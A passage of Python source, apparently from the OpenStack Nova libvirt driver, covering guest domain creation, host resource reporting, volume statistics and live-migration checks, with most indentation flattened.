'network_info=%(network_info)s '
'disk_info=%(disk_info)s '
'image_meta=%(image_meta)s rescue=%(rescue)s'
                    ' block_device_info=%(block_device_info)s'),
{'instance': instance, 'network_info': network_info,
'disk_info': disk_info, 'image_meta': image_meta,
'rescue': rescue, 'block_device_info': block_device_info})
conf = self.get_guest_config(instance, network_info, image_meta,
disk_info, rescue, block_device_info)
xml = conf.to_xml()
if write_to_disk:
instance_dir = libvirt_utils.get_instance_path(instance)
xml_path = os.path.join(instance_dir, 'libvirt.xml')
libvirt_utils.write_to_file(xml_path, xml)
LOG.debug(_('End to_xml instance=%(instance)s xml=%(xml)s'),
{'instance': instance, 'xml': xml})
return xml
def _lookup_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _lookup_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def get_info(self, instance):
"""Retrieve information from libvirt for a specific instance name.
If a libvirt error is encountered during lookup, we might raise a
NotFound exception or Error exception depending on how severe the
libvirt error is.
"""
virt_dom = self._lookup_by_name(instance['name'])
(state, max_mem, mem, num_cpu, cpu_time) = virt_dom.info()
return {'state': LIBVIRT_POWER_STATE[state],
'max_mem': max_mem,
'mem': mem,
'num_cpu': num_cpu,
'cpu_time': cpu_time,
'id': virt_dom.ID()}
def _create_domain(self, xml=None, domain=None,
instance=None, launch_flags=0, power_on=True):
"""Create a domain.
Either domain or xml must be passed in. If both are passed, then
the domain definition is overwritten from the xml.
"""
inst_path = None
if instance:
inst_path = libvirt_utils.get_instance_path(instance)
if CONF.libvirt_type == 'lxc':
if not inst_path:
inst_path = None
container_dir = os.path.join(inst_path, 'rootfs')
fileutils.ensure_tree(container_dir)
image = self.image_backend.image(instance, 'disk')
disk.setup_container(image.path,
container_dir=container_dir,
use_cow=CONF.use_cow_images)
if xml:
try:
domain = self._conn.defineXML(xml)
except Exception as e:
LOG.error(_("An error occurred while trying to define a domain"
" with xml: %s") % xml)
raise e
if power_on:
try:
domain.createWithFlags(launch_flags)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("An error occurred while trying to launch a "
"defined domain with xml: %s") %
domain.XMLDesc(0))
try:
self._enable_hairpin(domain.XMLDesc(0))
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_("An error occurred while enabling hairpin mode on "
"domain with xml: %s") % domain.XMLDesc(0))
# NOTE(uni): Now the container is running with its own private mount
# namespace and so there is no need to keep the container rootfs
# mounted in the host namespace
if CONF.libvirt_type == 'lxc':
state = self.get_info(instance)['state']
container_dir = os.path.join(inst_path, 'rootfs')
if state == power_state.RUNNING:
disk.clean_lxc_namespace(container_dir=container_dir)
else:
disk.teardown_container(container_dir=container_dir)
return domain
def _create_domain_and_network(self, xml, instance, network_info,
block_device_info=None, power_on=True):
"""Do required network setup and create domain."""
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
self.volume_driver_method('connect_volume',
connection_info,
disk_info)
self.plug_vifs(instance, network_info)
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance, network_info)
domain = self._create_domain(xml, instance=instance, power_on=power_on)
self.firewall_driver.apply_instance_filter(instance, network_info)
return domain
def get_all_block_devices(self):
"""
Return all block devices in use on this node.
"""
devices = []
for dom_id in self.list_instance_ids():
try:
domain = self._lookup_by_id(dom_id)
doc = etree.fromstring(domain.XMLDesc(0))
except exception.InstanceNotFound:
LOG.info(_("libvirt can't find a domain with id: %s") % dom_id)
continue
except Exception:
continue
ret = doc.findall('./devices/disk')
for node in ret:
if node.get('type') != 'block':
continue
for child in node.getchildren():
if child.tag == 'source':
devices.append(child.get('dev'))
return devices
def get_disks(self, instance_name):
"""
Note that this function takes an instance name.
Returns a list of all block devices for this domain.
"""
domain = self._lookup_by_name(instance_name)
xml = domain.XMLDesc(0)
try:
doc = etree.fromstring(xml)
except Exception:
return []
return filter(bool,
[target.get("dev")
for target in doc.findall('devices/disk/target')])
def get_interfaces(self, xml):
"""
Note that this function takes a domain xml.
Returns a list of all network interfaces for this instance.
"""
doc = None
try:
doc = etree.fromstring(xml)
except Exception:
return []
interfaces = []
ret = doc.findall('./devices/interface')
for node in ret:
devdst = None
for child in list(node):
if child.tag == 'target':
devdst = child.attrib['dev']
if devdst is None:
continue
interfaces.append(devdst)
return interfaces
def _get_cpuset_ids(self):
"""
        Parse the vcpu_pin_set config.
        Returns a list of pcpu ids that can be used by instances.
"""
cpuset_ids = set()
cpuset_reject_ids = set()
for rule in CONF.vcpu_pin_set.split(','):
rule = rule.strip()
# Handle multi ','
if len(rule) < 1:
continue
# Note the count limit in the .split() call
range_parts = rule.split('-', 1)
if len(range_parts) > 1:
# So, this was a range; start by converting the parts to ints
try:
start, end = [int(p.strip()) for p in range_parts]
except ValueError:
raise exception.Invalid(_("Invalid range expression %r")
% rule)
# Make sure it's a valid range
if start > end:
raise exception.Invalid(_("Invalid range expression %r")
% rule)
# Add available pcpu ids to set
cpuset_ids |= set(range(start, end + 1))
elif rule[0] == '^':
# Not a range, the rule is an exclusion rule; convert to int
try:
cpuset_reject_ids.add(int(rule[1:].strip()))
except ValueError:
raise exception.Invalid(_("Invalid exclusion "
"expression %r") % rule)
else:
# OK, a single PCPU to include; convert to int
try:
cpuset_ids.add(int(rule))
except ValueError:
raise exception.Invalid(_("Invalid inclusion "
"expression %r") % rule)
# Use sets to handle the exclusion rules for us
cpuset_ids -= cpuset_reject_ids
if not cpuset_ids:
raise exception.Invalid(_("No CPUs available after parsing %r") %
CONF.vcpu_pin_set)
# This will convert the set to a sorted list for us
return sorted(cpuset_ids)
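        # Worked example (hypothetical config): vcpu_pin_set = "4-12,^8,15"
        # expands to the range {4..12}, the exclusion {8} and the single id
        # {15}, so this method returns [4, 5, 6, 7, 9, 10, 11, 12, 15].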
def get_vcpu_total(self):
"""Get available vcpu number of physical computer.
:returns: the number of cpu core instances can be used.
"""
if self._vcpu_total != 0:
return self._vcpu_total
try:
total_pcpus = self._conn.getInfo()[2]
except libvirt.libvirtError:
LOG.warn(_("Cannot get the number of cpu, because this "
"function is not implemented for this platform. "))
return 0
if CONF.vcpu_pin_set is None:
self._vcpu_total = total_pcpus
return self._vcpu_total
available_ids = self._get_cpuset_ids()
if available_ids[-1] >= total_pcpus:
raise exception.Invalid(_("Invalid vcpu_pin_set config, "
"out of hypervisor cpu range."))
self._vcpu_total = len(available_ids)
return self._vcpu_total
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._conn.getInfo()[1]
@staticmethod
def get_local_gb_info():
"""Get local storage info of the compute node in GB.
:returns: A dict containing:
:total: How big the overall usable filesystem is (in gigabytes)
:free: How much space is free (in gigabytes)
:used: How much space is used (in gigabytes)
"""
if CONF.libvirt_images_type == 'lvm':
info = libvirt_utils.get_volume_group_info(
CONF.libvirt_images_volume_group)
else:
info = libvirt_utils.get_fs_info(CONF.instances_path)
for (k, v) in info.iteritems():
info[k] = v / (1024 ** 3)
return info
def get_vcpu_used(self):
"""Get vcpu usage number of physical computer.
:returns: The total number of vcpu that currently used.
"""
total = 0
if CONF.libvirt_type == 'lxc':
return total + 1
dom_ids = self.list_instance_ids()
for dom_id in dom_ids:
try:
dom = self._lookup_by_id(dom_id)
vcpus = dom.vcpus()
if vcpus is None:
LOG.debug(_("couldn't obtain the vpu count from domain id:"
" %s") % dom_id)
else:
total += len(vcpus[1])
except exception.InstanceNotFound:
LOG.info(_("libvirt can't find a domain with id: %s") % dom_id)
continue
            # NOTE(gtt116): give other tasks a chance to run.
greenthread.sleep(0)
return total
def get_memory_mb_used(self):
"""Get the free memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
m = open('/proc/meminfo').read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
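        # /proc/meminfo is split on whitespace, so m looks roughly like
        # ['MemTotal:', '2039604', 'kB', 'MemFree:', '1274356', 'kB', ...]
        # (values here are just an example); m[idx + 1] is the amount in kB
        # following each label.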
if CONF.libvirt_type == 'xen':
used = 0
for domain_id in self.list_instance_ids():
try:
dom_mem = int(self._lookup_by_id(domain_id).info()[2])
except exception.InstanceNotFound:
LOG.info(_("libvirt can't find a domain with id: %s")
% domain_id)
continue
# skip dom0
if domain_id != 0:
used += dom_mem
else:
                    # the memory reported by dom0 is greater than what
                    # it is actually using
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / 1024
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self.get_memory_mb_total() - avail / 1024
def get_hypervisor_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self._conn.getType()
def get_hypervisor_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
# NOTE(justinsb): getVersion moved between libvirt versions
        # Trying to be compatible with older versions is a lost cause
# But ... we can at least give the user a nice message
method = getattr(self._conn, 'getVersion', None)
if method is None:
raise exception.NovaException(_("libvirt version is too old"
" (does not support getVersion)"))
# NOTE(justinsb): If we wanted to get the version, we could:
# method = getattr(libvirt, 'getVersion', None)
# NOTE(justinsb): This would then rely on a proper version check
return method()
def get_hypervisor_hostname(self):
"""Returns the hostname of the hypervisor."""
return self._conn.getHostname()
def get_instance_capabilities(self):
"""Get hypervisor instance capabilities
Returns a list of tuples that describe instances the
hypervisor is capable of hosting. Each tuple consists
of the triplet (arch, hypervisor_type, vm_mode).
:returns: List of tuples describing instance capabilities
"""
caps = self.get_host_capabilities()
instance_caps = list()
for g in caps.guests:
for dt in g.domtype:
instance_cap = (g.arch, dt, g.ostype)
instance_caps.append(instance_cap)
return instance_caps
def get_cpu_info(self):
"""Get cpuinfo information.
        Obtains the cpu features from virConnect.getCapabilities
        and returns them as a json string.
:return: see above description
"""
caps = self.get_host_capabilities()
cpu_info = dict()
cpu_info['arch'] = caps.host.cpu.arch
cpu_info['model'] = caps.host.cpu.model
cpu_info['vendor'] = caps.host.cpu.vendor
topology = dict()
topology['sockets'] = caps.host.cpu.sockets
topology['cores'] = caps.host.cpu.cores
topology['threads'] = caps.host.cpu.threads
cpu_info['topology'] = topology
features = list()
for f in caps.host.cpu.features:
features.append(f.name)
cpu_info['features'] = features
# TODO(berrange): why do we bother converting the
# libvirt capabilities XML into a special JSON format ?
# The data format is different across all the drivers
        # so we could just return the raw capabilities XML
# which 'compare_cpu' could use directly
#
# That said, arch_filter.py now seems to rely on
# the libvirt drivers format which suggests this
# data format needs to be standardized across drivers
return jsonutils.dumps(cpu_info)
def get_all_volume_usage(self, context, compute_host_bdms):
"""Return usage info for volumes attached to vms on
a given host.
"""
vol_usage = []
for instance_bdms in compute_host_bdms:
instance = instance_bdms['instance']
for bdm in instance_bdms['instance_bdms']:
vol_stats = []
mountpoint = bdm['device_name']
if mountpoint.startswith('/dev/'):
mountpoint = mountpoint[5:]
volume_id = bdm['volume_id']
LOG.debug(_("Trying to get stats for the volume %s"),
volume_id)
vol_stats = self.block_stats(instance['name'], mountpoint)
if vol_stats:
stats = dict(volume=volume_id,
instance=instance,
rd_req=vol_stats[0],
rd_bytes=vol_stats[1],
wr_req=vol_stats[2],
wr_bytes=vol_stats[3],
flush_operations=vol_stats[4])
LOG.debug(
_("Got volume usage stats for the volume=%(volume)s,"
" instance=%(instance)s, rd_req=%(rd_req)d,"
" rd_bytes=%(rd_bytes)d, wr_req=%(wr_req)d,"
" wr_bytes=%(wr_bytes)d")
% stats)
vol_usage.append(stats)
return vol_usage
def block_stats(self, instance_name, disk):
"""
Note that this function takes an instance name.
"""
try:
domain = self._lookup_by_name(instance_name)
return domain.blockStats(disk)
except libvirt.libvirtError as e:
errcode = e.get_error_code()
LOG.info(_('Getting block stats failed, device might have '
'been detached. Instance=%(instance_name)s '
'Disk=%(disk)s Code=%(errcode)s Error=%(e)s'),
{'instance_name': instance_name, 'disk': disk,
'errcode': errcode, 'e': e})
except exception.InstanceNotFound:
LOG.info(_('Could not find domain in libvirt for instance %s. '
'Cannot get block stats for device'), instance_name)
def interface_stats(self, instance_name, interface):
"""
Note that this function takes an instance name.
"""
domain = self._lookup_by_name(instance_name)
return domain.interfaceStats(interface)
def get_console_pool_info(self, console_type):
#TODO(mdragon): console proxy should be implemented for libvirt,
# in case someone wants to use it with kvm or
# such. For now return fake data.
return {'address': '127.0.0.1',
'username': 'fakeuser',
'password': 'fakepassword'}
def refresh_security_group_rules(self, security_group_id):
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def get_available_resource(self, nodename):
"""Retrieve resource info.
This method is called as a periodic task and is used only
in live migration currently.
:param nodename: ignored in this driver
:returns: dictionary containing resource info
"""
def _get_disk_available_least():
"""Return total real disk available least size.
The size of available disk, when block_migration command given
disk_over_commit param is FALSE.
The size that deducted real instance disk size from the total size
of the virtual disk of all instances.
"""
disk_free_gb = disk_info_dict['free']
disk_over_committed = self.get_disk_over_committed_size_total()
# Disk available least size
available_least = disk_free_gb * (1024 ** 3) - disk_over_committed
return (available_least / (1024 ** 3))
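            # Example (hypothetical numbers): with 100 GB free and 30 GB of
            # over-committed virtual disk, disk_available_least is 70 GB.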
disk_info_dict = self.get_local_gb_info()
dic = {'vcpus': self.get_vcpu_total(),
'memory_mb': self.get_memory_mb_total(),
'local_gb': disk_info_dict['total'],
'vcpus_used': self.get_vcpu_used(),
'memory_mb_used': self.get_memory_mb_used(),
'local_gb_used': disk_info_dict['used'],
'hypervisor_type': self.get_hypervisor_type(),
'hypervisor_version': self.get_hypervisor_version(),
'hypervisor_hostname': self.get_hypervisor_hostname(),
'cpu_info': self.get_cpu_info(),
'disk_available_least': _get_disk_available_least()}
return dic
def check_instance_shared_storage_local(self, context, instance):
dirpath = libvirt_utils.get_instance_path(instance)
if not os.path.exists(dirpath):
return None
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug(_("Creating tmpfile %s to verify with other "
"compute node that the instance is on "
"the same shared storage.") % tmp_file)
os.close(fd)
return {"filename": tmp_file}
def check_instance_shared_storage_remote(self, context, data):
return os.path.exists(data['filename'])
def check_instance_shared_storage_cleanup(self, context, data):
fileutils.delete_if_exists(data["filename"])
def check_can_live_migrate_destination(self, context, instance,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing:
:filename: name of the tmpfile under CONF.instances_path
:block_migration: whether this is block migration
:disk_over_commit: disk-over-commit factor on dest host
:disk_available_mb: available disk space on dest host
"""
disk_available_mb = None
if block_migration:
disk_available_gb = dst_compute_info['disk_available_least']
disk_available_mb = \
(disk_available_gb * 1024) - CONF.reserved_host_disk_mb
# Compare CPU
source_cpu_info = src_compute_info['cpu_info']
self._compare_cpu(source_cpu_info)
# Create file on storage, to be checked on source host
filename = self._create_shared_storage_test_file()
return {"filename": filename,
"block_migration": block_migration,
"disk_over_commit": disk_over_commit,
"disk_available_mb": disk_available_mb}
def check_can_live_migrate_destination_cleanup(self, context,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param context: security context
"""
filename = dest_check_data["filename"]
self._cleanup_shared_storage_test_file(filename)
def check_can_live_migrate_source(self, context, instance,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
# Checking shared storage connectivity
        # if block migration, instances_path should not be on shared storage.
source = CONF.host
filename = dest_check_data["filename"]
block_migration = dest_check_data["block_migration"]
is_volume_backed = dest_check_data.get('is_volume_backed', False)
shared = self._check_shared_storage_test_file(filename)
if block_migration:
if shared:
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidLocalStorage(reason=reason, path=source)
self._assert_dest_node_has_enough_disk(context, instance,
dest_check_data['disk_available_mb'],
dest_check_data['disk_over_commit'])
elif not shared and not is_volume_backed:
reason = _("Live migration can not be used "
"without shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=source)
dest_check_data.update({"is_shared_storage": shared})
# NOTE(mikal): include the instance directory name here because it
# doesn't yet exist on the destination but we want to force that
# same name to be used
instance_path = libvirt_utils.get_instance_path(instance,
relative=True)
dest_check_data['instance_relative_path'] = instance_path
return dest_check_data
def _assert_dest_node_has_enough_disk(self, context, instance,
available_mb, disk_over_commit):
"""Checks if destination has enough disk for block migration."""
        # Libvirt supports the qcow2 disk format, which is usually sparse
        # on compute nodes.
        # A real (allocated) disk image may grow up to its "virtual disk
        # size", which is the maximum disk size specified at creation.
        # (See qemu-img info <path-to-disk>)
        # The scheduler considers the destination host to have enough disk
        # space if:
        #   real disk size < available disk size, when disk_over_commit is
        #   True; otherwise, virtual disk size < available disk size.
available = 0
if available_mb:
available = available_mb * (1024 ** 2)
ret = self.get_instance_disk_info(instance['name'])
disk_infos = jsonutils.loads(ret)
necessary = 0
if disk_over_commit:
for info in disk_infos:
necessary += int(info['disk_size'])
else:
for info in disk_infos:
necessary += int(info['virt_disk_size'])
# Check that available disk > necessary disk
if (available - necessary) < 0:
reason = (_('Unable to migrate %(instance_uuid)s: '
                        'Disk of instance is too large (available'
                        ' on destination host: %(available)s '
                        '< need: %(necessary)s)') %
{'instance_uuid': instance['uuid'],
'available': available,
'necessary': necessary})
raise exception.MigrationPreCheckError(reason=reason)
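        # Example (hypothetical numbers): with available_mb = 10240 (10 GB)
        # and two qcow2 disks whose virt_disk_size totals 12 GB, the check
        # fails unless disk_over_commit is True and their actual disk_size
        # total fits within the 10 GB.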
def _compare_cpu(self, cpu_info):
"""Checks the host cpu is compatible to a cpu given by xml.
"xml" must be a part of libvirt.openReadonly().getCapabilities().
return values follows by virCPUCompareResult.
if 0 > return value, do live migration.
'http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult'
:param cpu_info: json string that shows cpu feature(see get_cpu_info())
:returns:
None. if given cpu info is not compatible to this server,
raise exception.
"""
# NOTE(berendt): virConnectCompareCPU not working for Xen
if CONF.libvirt_type == 'xen':
return 1
info = jsonutils.loads(cpu_info)
LOG.info(_('Instance launched has CPU info:\n%s') % cpu_info)
cpu = vconfig.LibvirtConfigCPU()
cpu.arch = info['arch']
cpu.model = info['model']
cpu.vendor = info['vendor']
cpu.sockets = info['topology']['sockets']
cpu.cores = info['topology']['cores']
cpu.threads = info['topology']['threads']
for f in info['features']:
cpu.add_feature(vconfig.LibvirtConfigCPUFeature(f))
u = "http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult"
m = _("CPU doesn't have compatibility.\n\n%(ret)s\n\nRefer to %(u)s")
        # if an unknown character exists in the xml, libvirt complains
try:
ret = self._conn.compareCPU(cpu.to_xml(), 0)
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
ret = e.message
LOG.error(m, {'ret': ret, 'u': u})
if ret <= 0:
LOG.error(m, {'ret': ret, 'u': u})
raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
def _create_shared_storage_test_file(self):
"""Makes tmpfile under CONF.instances_path."""
dirpath = CONF.instances_path
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug(_("Creating tmpfile %s to notify to other "
"compute nodes that they should mount "
"the same storage.") % tmp_file)
os.close(fd)
return os.path.basename(tmp_file)
def _check_shared_storage_test_file(self, filename):
"""Confirms existence of the tmpfile under CONF.instances_path.
        Returns False if the tmpfile cannot be confirmed.
"""
tmp_file = os.path.join(CONF.instances_path, filename)
        return os.path.exists(tmp_file)
def _cleanup_shared_storage_test_file(self, filename):
"""Removes existence of the tmpfile under CONF.instances_path."""
tmp_file = os.path.join(CONF.instances_path, filename)
os.remove(tmp_file)
def ensure_filtering_rules_for_instance(self, instance, network_info,
time_module=None):
"""Ensure that an instance's filtering rules are enabled.
When migrating an instance, we need the filtering rules to
be configured on the destination host before starting the
migration.
Also, when restarting the compute service, we need to ensure
that filtering rules exist for all running services.
"""
if not time_module:
time_module = greenthread
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
# nwfilters may be defined in a separate thread in the case
# of libvirt non-blocking mode, so we wait for completion
timeout_count = range(CONF.live_migration_retry_count)
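        # timeout_count acts as a simple countdown: one element is popped per
        # iteration of the loop below, so the wait gives up after
        # live_migration_retry_count one-second polls if the nwfilter has
        # still not appeared.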
while timeout_count:
if self.firewall_driver.instance_filter_exists(instance,
network_info):
break
timeout_count.pop()
if len(timeout_count) == 0:
msg = _('The firewall filter for %s does not exist')
raise exception.NovaException(msg % instance["name"])
time_module.sleep(1)
def filter_defer_apply_on(self):
self.firewall_driver.filter_defer_apply_on()
def filter_defer_apply_off(self):
self.firewall_driver.filter_defer_apply_off()
def live_migration(self, context, instance, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Spawning live_migration operation for distributing high-load.
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
        :params dest: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params block_migration: if true, do block migration.
:params migrate_data: implementation specific params
"""
greenthread.spawn(self._live_migration, context, instance, dest,
post_method, recover_method, block_migration,
migrate_data)
def _live_migration(self, context, instance, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
"""Do live migration.
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params migrate_data: implementation specific params
"""
# Do live migration.
try:
if block_migration:
flaglist = CONF.block_migration_flag.split(',')
else:
flaglist = CONF.live_migration_flag.split(',')
flagvals = [getattr(libvirt, x.strip()) for x in flaglist]
logical_sum = reduce(lambda x, y: x | y, flagvals)
dom = self._lookup_by_name(instance["name"])
dom.migrateToURI(CONF.live_migration_uri % dest,
logical_sum,
None,
CONF.live_migration_bandwidth)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Live Migration failure: %s"), e,
instance=instance)
recover_method(context, instance, dest, block_migration)
# Waiting for completion of live_migration.
timer = loopingcall.FixedIntervalLoopingCall(f=None)
def wait_for_live_migration():
"""waiting for live migration completion."""
try:
self.get_info(instance)['state']
except exception.NotFound:
timer.stop()
post_method(context, instance, dest, block_migration,
migrate_data)
timer.f = wait_for_live_migration
timer.start(interval=0.5).wait()
def _fetch_instance_kernel_ramdisk(self, context, instance):
"""Download kernel and ramdisk for instance in instance directory."""
instance_dir = libvirt_utils.get_instance_path(instance)
if instance['kernel_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir, 'kernel'),
instance['kernel_id'],
instance['user_id'],
instance['project_id'])
if instance['ramdisk_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir,
'ramdisk'),
instance['ramdisk_id'],
instance['user_id'],
instance['project_id'])
def pre_live_migration(self, context, instance, block_device_info,
network_info, migrate_data=None):
"""Preparation live migration."""
# Steps for volume backed instance live migration w/o shared storage.
is_shared_storage = True
is_volume_backed = False
is_block_migration = True
instance_relative_path = None
if migrate_data:
is_shared_storage = migrate_data.get('is_shared_storage', True)
is_volume_backed = migrate_data.get('is_volume_backed', False)
is_block_migration = migrate_data.get('block_migration', True)
instance_relative_path = migrate_data.get('instance_relative_path')
if not is_shared_storage:
# NOTE(mikal): this doesn't use libvirt_utils.get_instance_path
# because we are ensuring that the same instance directory name
# is used as was at the source
if instance_relative_path:
instance_dir = os.path.join(CONF.instances_path,
instance_relative_path)
else:
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
if is_volume_backed and not (is_block_migration or is_shared_storage):
# Touch the console.log file, required by libvirt.
console_file = self._get_console_log_path(instance)
libvirt_utils.file_open(console_file, 'a').close()
        # if the image has a kernel and ramdisk, just download them
        # the normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
# Establishing connection to volume server.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
self.volume_driver_method('connect_volume',
connection_info,
disk_info)
# We call plug_vifs before the compute manager calls
# ensure_filtering_rules_for_instance, to ensure bridge is set up
        # Retrying is necessary because requests arrive continuously;
        # when concurrent requests hit iptables, it complains.
max_retry = CONF.live_migration_retry_count
for cnt in range(max_retry):
try:
self.plug_vifs(instance, network_info)
break
except processutils.ProcessExecutionError:
if cnt == max_retry - 1:
raise
else:
LOG.warn(_('plug_vifs() failed %(cnt)d. Retry up to '
'%(max_retry)d.'),
{'cnt': cnt,
'max_retry': max_retry},
instance=instance)
greenthread.sleep(1)
def pre_block_migration(self, context, instance, disk_info_json):
"""Preparation for block migration."""
# NOTE (rmk): When preparing for a block migration, the instance dir
# should not exist on the destination hypervisor.
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
self._create_images_and_backing(context, instance, disk_info_json)
def _create_images_and_backing(self, context, instance, disk_info_json):
"""
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params disk_info_json:
json strings specified in get_instance_disk_info
"""
disk_info = jsonutils.loads(disk_info_json)
instance_dir = libvirt_utils.get_instance_path(instance)
for info in disk_info:
base = os.path.basename(info['path'])
# Get image type and create empty disk image, and
# create backing file in case of qcow2.
instance_disk = os.path.join(instance_dir, base)
if not info['backing_file'] and not os.path.exists(instance_disk):
libvirt_utils.create_image(info['type'], instance_disk,
info['disk_size'])
else:
                # Creating the backing file follows the same path as
                # spawning an instance.
cache_name = os.path.basename(info['backing_file'])
image = self.image_backend.image(instance,
instance_disk,
CONF.libvirt_images_type)
image.cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=cache_name,
image_id=instance['image_ref'],
user_id=instance['user_id'],
project_id=instance['project_id'],
size=info['virt_disk_size'])
        # if the image has a kernel and ramdisk, just download them
        # the normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
def post_live_migration_at_destination(self, context,
instance,
network_info,
block_migration,
block_device_info=None):
"""Post operation of live migration at destination host.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param network_info: instance network information
        :param block_migration: if true, post operation of block_migration.
"""
# Define migrated instance, otherwise, suspend/destroy does not work.
dom_list = self._conn.listDefinedDomains()
if instance["name"] not in dom_list:
# In case of block migration, destination does not have
# libvirt.xml
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance)
            self.to_xml(instance, network_info, disk_info,
                        block_device_info=block_device_info,
                        write_to_disk=True)
# libvirt.xml should be made by to_xml(), but libvirt
# does not accept to_xml() result, since uuid is not
# included in to_xml() result.
dom = self._lookup_by_name(instance["name"])
self._conn.defineXML(dom.XMLDesc(0))
def get_instance_disk_info(self, instance_name, xml=None,
block_device_info=None):
"""Preparation block migration.
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:return:
json strings with below format::
"[{'path':'disk', 'type':'raw',
'virt_disk_size':'10737418240',
'backing_file':'backing_file',
'disk_size':'83886080'},...]"
"""
# NOTE (rmk): Passing the domain XML into this function is optional.
# When it is not passed, we attempt to extract it from
# the pre-existing definition.
if xml is None:
try:
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
msg = (_('Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] '
'%(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
LOG.warn(msg)
